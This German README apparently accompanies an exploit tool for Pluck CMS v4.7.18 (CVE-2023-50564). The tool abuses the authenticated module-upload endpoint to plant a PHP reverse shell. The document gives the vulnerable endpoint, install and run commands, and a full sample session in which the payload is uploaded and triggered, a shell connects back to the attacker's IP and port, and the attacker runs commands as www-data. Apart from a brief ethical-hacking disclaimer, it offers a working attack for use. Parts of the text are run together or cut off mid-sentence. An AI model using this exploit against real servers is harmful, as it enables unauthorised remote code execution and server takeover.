
Dieses Skript nutzt die Datei-Upload-Funktion in Pluck CMS v4.7.18 aus, um eine schädliche PHP-Datei hochzuladen, die Remote-Zugriff über eine Reverse-Shell ermöglicht. Nach dem Hochladen gewährt diese Hintertür dem Angreifer Serverzugriff mit Webserver-Berechtigungen und ermöglicht weitere Aktionen innerhalb des Systems oder Netzwerks.
Dieses Skript nutzt eine authentifizierte Schwachstelle für beliebigen Dateiupload in Pluck CMS v4.7.18 (CVE-2023-50564) aus. Durch die Ausnutzung dieser Schwachstelle kann ein authentifizierter Angreifer eine schädliche PHP-Datei hochladen und so die Ausführung von beliebigem Code (in diesem Fall eine Reverse Shell) ermöglichen.
Die Schwachstelle existiert im Endpunkt /admin.php?action=installmodule, der es einem authentifizierten Benutzer erlaubt, eine ZIP-Datei mit beliebigen Dateien hochzuladen. Durch das Hochladen einer schädlichen PHP-Datei richtet dieser Exploit eine Reverse Shell zurück zum Angreifer ein.
pip install requestspip install requests-toolbeltDieses Skript erfordert außerdem einen gültigen Login für die Pluck-CMS-Instanz, einschließlich der URL und des Passworts des Zielsystems.
su, sudo -l) und ermöglicht es dem Benutzer, Eingaben manuell vorzunehmen.git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
cd Pluck-CMS-Exploit
pip install requests requests-toolbelt
Führen Sie den Exploit mit Python aus:
python3 exploit.py
Beispiel:
$ python3 exploit.py
Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
Enter the password for target authentication: password123
Enter your IP (for reverse shell): 10.10.14.5
Enter the port to listen on (for reverse shell): 4444
[*] Authenticating to the target...
[+] Authentication successful.
[*] Generating reverse shell PHP file...
[+] Reverse shell PHP file created successfully as 'shell.php'.
[*] Creating ZIP payload...
[+] ZIP file created as 'payload.zip'.
[*] Starting reverse shell listener on 10.10.14.5:4444 ...
[*] Uploading payload to the target...
[+] Payload uploaded successfully.
[*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
[+] Connection received from ('10.10.10.1', 55678)
Shell> whoami
www-data
Dieses Skript ist für Bildungszwecke und ethisches Hacken gedacht. Es sollte nur in Umgebungen verwendet werden, in denen Sie die ausdrückliche Erlaubnis zum Testen haben. Der Autor ist nicht für jeglichen Missbrauch dieses Tools verantwortlich.
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe MIT-Lizenz für Details.
Sie können das Repository gerne forken und Pull-Requests einreichen. Bei Problemen oder Feature-Wünschen eröffnen Sie bitte ein Issue auf GitHub.